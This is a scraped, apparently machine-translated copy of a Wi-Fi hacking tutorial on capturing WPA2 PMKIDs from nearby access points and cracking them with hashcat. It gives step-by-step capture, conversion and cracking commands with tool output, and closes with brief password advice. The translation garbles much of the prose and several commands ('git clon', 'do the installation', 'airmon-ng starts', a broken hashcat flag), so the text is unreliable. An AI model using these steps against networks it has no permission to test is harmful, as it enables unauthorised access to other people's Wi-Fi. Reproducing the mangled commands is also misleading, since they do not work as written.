قالب وردپرس درنا توس
Home / Tips and Tricks / Cracking WPA2 password using the new PMKID hashcat attack "Null Byte :: WonderHowTo

Cracking WPA2 password using the new PMKID hashcat attack "Null Byte :: WonderHowTo



The Cracking password for WPA2 networks has been about the same for many years, but a new attack requires less interaction and information than previous technologies and has the added benefit of targeting access points without anyone connected. This new attack against PMKID uses Hashcat to crack WPA passwords and allows hackers to easily find networks with weak passwords.

The Old Way to Break WPA2 Password

The old way to break WPA2 has been a long time and temporarily involves disconnecting a connected device from the access point we want to try to crack. This has two disadvantages that are important for Wi-Fi hackers to understand.

The first disadvantage is the requirement that someone is connected to the network to attack it. The network password may be weak and very easy to break, but without a device associated with card kicking, there is no possibility of catching a handshake so no chance of trying to crack it.

The second disadvantage of this tactic is that it's noisy and legally worrying because it forces you to send packages that deliberately disconnect an authorized user to a service they pay to use. This type of unauthorized interference is technically an attack of denial of service and, if it is long lasting, corresponds to interference with a network. This can lead to problems and can be easily detected by some of our previous guides.

A New Password Spam Method

Instead of relying on interrupting two-way communication between Wi-Fi devices to attempt to crack the password, Attacker can communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat Forum detailed a new technique that was an attack on Robust Security Network Information Element (RSN) in a single EAPOL framework to capture the information needed to try a brute- power attack.

Like the previous attacks on WPA, the attacker must be near the network they want to attack. The goal is to use a Kali-compatible wireless network adapter to capture the information needed from the network to try to create brutally enforcing passwords. Instead of using Aireplay-ng or Aircrack-ng, we use a new wireless attack tool to make this called hcxtools.

Using Hcxtools & Hashcat

Hcxdumptool and hcxpcaptool are tools written for Wi-Fi revision and penetration testing, and allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKID hackers. It works like Besside-ng by requiring minimal arguments to launch a command line attack, can run against either specific targets or convenience targets and can easily be performed over SSH on a Raspberry Pi or other unattended device.

When PMKID is captured, the next step is to load the harrow in Hashcat and try to crack the password. This is where hcxtools differs from Besside-ng, because a conversion step is required to prepare the Hashcat file to use. We use hcxpcaptool to convert our PCAPNG file to a Hashcat to work with and just leave the step of selecting a strong list of passwords for your broken defense attempts.

It is worth mentioning that not every network is vulnerable to this attack. Since this is a field chosen by some manufacturers, you should not expect universal success with this technology. Whether you can capture PMKID depends on whether the manufacturer of the access point liked you to include an item containing it and if you can crack the captured PMKID depends on whether the underlying password is in your brute force password list. If any condition is not met, this attack will fail.

What you need

To try this attack, you must run Kali Linux and have access to a wireless network adapter that supports monitoring mode and package injection. We have several guides on how to choose a compatible wireless network adapter below.

Aside from a Kali-compatible network adapter, ensure that you have fully updated and upgraded your system.

Recommended: Alfa AWUS036NHA 2.4GHz

Step 1: Install Hxctools & Hashcat

First, we will do it. install the tools we need. To download, type the following in a terminal window.

  git clon https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
do
do the installation 

When this stops installing we will move to install hxctools. To do this, open a terminal window and paste the following line by line. If you get an error, try typing sudo before the command.

  CD
git clone https://github.com/ZerBea/hcxtools.git
cd hxctools
do
do the installation 

Finally, we must install Hashcat. This should be easy, as it is included in the Kali Linux repo by default. Just enter the following to install the latest version of Hashcat.

  apt install hashcat 

With this complete we can continue to configure the wireless network adapter.

Step 2: Prepare the Wireless Network Adapter [19659003] Once you have connected your Kali-compatible wireless network adapter, you can find the name by writing ifconfig or ip a . Typically, the name will be something like wlan0. The first step will be to put the card in wireless display mode so we can listen to Wi-Fi traffic in the immediate vicinity.

Type this command in a terminal window by entering the name of your wireless network adapter for wlan0.

  airmon-ng starts wlan0

Found 3 processes that can cause problems
Kill them with the help of "airmon-ng check kill" before setting
card in display mode, they will interfere with switching channels
and sometimes puts the interface back in handled mode

PID name
555 NetworkManager
611 wpa_supplicant
6636 dhclient

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (Rev 01)

(mac80211 display mode vif enabled for [phy0] wlan0 on [phy0] wlan0mon)
(Mac80211 station mode vif disabled for [phy0] wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n 

Now your wireless network card must have a name like "wlan0mon" and be in display mode. You can confirm this by running ifconfig again.

Step 3: Use Hxcdump to Capture PMKID from Local Networks

Now we're ready to capture the PMKID devices of devices we want to attack. With our wireless network card in screen mode like "wlan1mon" we perform the following command to begin the attack.

  hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status = 1 

Disconnect this -i describes the program which interface we use, in this case, wlan1mon. The filename we save the results to can be specified with the flag argument -o . The channel we want to scan can be specified with the flag -c followed by the number of the channel to be scanned.

In our command above we use wlan1mon to save captured PMKID to a file called "galleria.pcapng." While you can specify another status I have not been able to capture any value except for 1 .

  Warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
Warning: wlan1mon is probably a display interface

start capturing (stop ctrl + c)
INTERFACE: ...............: wlan1mon
FILTER LIST ...............: 0 items
MAC CLIENT ...............: fcc233ca8bc5
MAC ACCESS POINT .........: 10ae604b9e82 (incremented for each new client)
EAPOL TIMEOUT ............: 150000
REPLAYCOUNT ..............: 62439
ANONCE ...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [19659037] c8b5adb615e9 -> fcc233ca8bc5 [19659038] 2c95694f3ca0 -> fcc233ca8bc5 [19659038] 2c95694f3ca0 -> b4b686abc81a [19659040] 14edbb9938ea -> fcc233ca8bc5 [19659041] 88964e3a8ea0 -> fcc233ca8bc5 [19659042] dc7fa425888a -> fcc233ca8bc5 [19659043] 88964e801fa0 -> fcc233ca8bc5 [19659044] 9822efc6fdff -> ba634d3eb80d [19659045] 9822efc6fdff -> ba634d3eb80d [19659046] 803773defd01 -> fcc233ca8bc5 [19659047] 14edbb9ba0e6 -> 803773defd01 [19659048] 0618d629465b -> 58fb8433aac2 [19659049] e0220203294e -> fcc233ca8bc5 [19659050] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008]   14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008]   1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009]   e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001]   ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha = 2, rx = 32752, rx (lost) = 2801, tx = 2205, powned = 18, err = 0 

Once you have collected enough, you can stop the program by writing Ctrl- C to end the attack. This should produce a PCAPNG file containing the information we need to try a brute force attack, but we must convert it to a format that Hashcat can understand.

Step 4: Use Hxcpcaptool to Convert Dump to Hashcat

To convert our PCAPNG file, we use hcxpcaptool with some specified arguments. In the same folder as your .PCAPNG file is saved, run the following command in a terminal window.

  hcxpcaptool -E essidlist -I ID list -U usernamelist -z galleriaHC.16800 galleria.pcapng 

This command says hxcpcaptool to use the information in the file to help Hashcat understand it with flags -E -I and -U . The flag -Z is used for the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.

If you run the command, we'll show you the following.

  Summary:
--------
file name ....................: galleria.pcapng
file type ....................: pcapng 1.0
file hardware information ....: x86_64
file us information ..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type .................: DLT_IEEE802_11_RADIO (127)
endianess ....................: small endian
read error ..................: error free
Package inside ...............: 1089
skipped packages ..............: 0
package of GPS data ........: 0
package with FCS .............: 732
beacons (with ESSID inside): 49
probe requests ...............: 26
probe response ..............: 40
Association Requests .........: 103
association response ........: 204
reunification requests .......: 2
reassociation response ......: 7
Authentication (OPEN SYSTEM): 346
Authentications (BROADCOM) ...: 114
Authentications (APPLE) ......: 1
EAPOL Package ................: 304
EAPOL PMKIDs .................: 21
best handshakes ..............: 4 (ap-less: 1)

21 PMKID (s) written to galleriahC.16800 

Here we can see that we have collected 21 PMKID in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to try to crack network passwords.

Step 5: Select a Password List and Brute Force with Hashcat

To start attacking the hasher we've taken must choose a good password list. You can find several good password lists to get started on the SecList collection. When you have a password list, place it in the same folder as the .16800 file you just converted, and then run the following command in a terminal window.

  hashcat -m 16800 galleriaHC.16800 -a 0 - kernel acceler = 1 -w 4 --force topwifipass.txt & # 39; 

In this command, we launch Hashcat in the 16800 mode, which is to attack WPA-PMKID-PBKDF2 network protocols. Then we enter the name of the file we want to crack, in this case "galleriaHC.16800." The flag -a tells us what kind of attacks to use, in this case a "straight" attack and then -w and – kernel-acceler = 1 flags anger highest performance workload profile. If your computer is suffering from performance issues, you can lower the number in the argument -w .

Furthermore, the force force ignores some warnings to proceed with the attack and the last part of the command specifies the password list we use to try to force the PMKIDs in our file, in this case called " topwifipass.txt. "

Depending on the speed of the machine speed and the size of the password list, it may take quite some time to complete. To view the status at any time, press S the key for an update.

Step 6: Interpret Results

When Hashcat breaks out, you will be able to check in as it progresses to see if any keys have been restored.

When the password list comes close to the end, Hashcat will automatically adjust the workload and give you a final report when it's done.

  Approaching Final Key Ratio - Adjusted Workload.

Session ..........: hashcat
Status ...........: Exhausted
Hash.Type ........: WPA-PMKID-PBKDF2
Hash.Target ......: hotspotcap.16800
Time.Started .....: Sun 28 Oct 18:05:57 2018 (3 min, 49 seconds)
Time.Estimated ...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base .......: File (topwifipass.txt)
Guess.Queue ......: 1/1 (100.00%)
Speed.Dev. # 1 .....: 42 H / s (15.56ms) @ Accel: 1 Loops: 1024 Thr: 1 Vec: 4
Recovered ........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress .........: 9602/9602 (100.0%)
Rejected .........: 2/9602 (0.02%)
Restore.Point ....: 4801/4801 (100.0%)
Candidates. # 1 ....: 159159159 -> 00001111
HWon.Dev. # 1 ......: N / A

Started: Sun 28 October 18:05:56 2018
Stopped: Sun 28 Oct 18:09:49 2018 

If you have managed to break any passwords you will see them here. In our test run, none of the PMKIDs we collected passwords in our password list, so we could not crack any of the hashs. This is likely to be your result against all networks with a strong password but expect to see results here for networks with a weak password.

PMKID Hashcat Attack makes Wi-Fi attacks easier

While the new attack against Wi-Fi passwords makes it easier for hackers to attempt to attack a target, the same methods that were effective against previous types of WPA cracks remain effective. If your network does not even support the robust security element that contains PMKID, this attack has no chance of success. You can review your own network with hcxtools to see if it is susceptible to this attack.

Even if your network is vulnerable, a strong password is still the best defense against an attacker accessing your Wi-Fi network using this or another password attack.

Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common sources of guessing. The first is the users who choose default or worrying bad passwords, such as "12345678" or "password." These are easily broken. The second source of password errands comes from data violations that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists tend to be very effective when cracking Wi-Fi networks.

I hope you have this guide for the new PMKID-based Hashcat attack on WPA2 password! If you have any questions about this Wi-Fi password cracking tutorial or if you have a comment, please contact me on Twitter @ KodyKinzie .

Do not Miss: Null Bytes Collection of Wi-Fi Hacking Guides

Cover photo and screenshots of Kody / Null Byte




Source link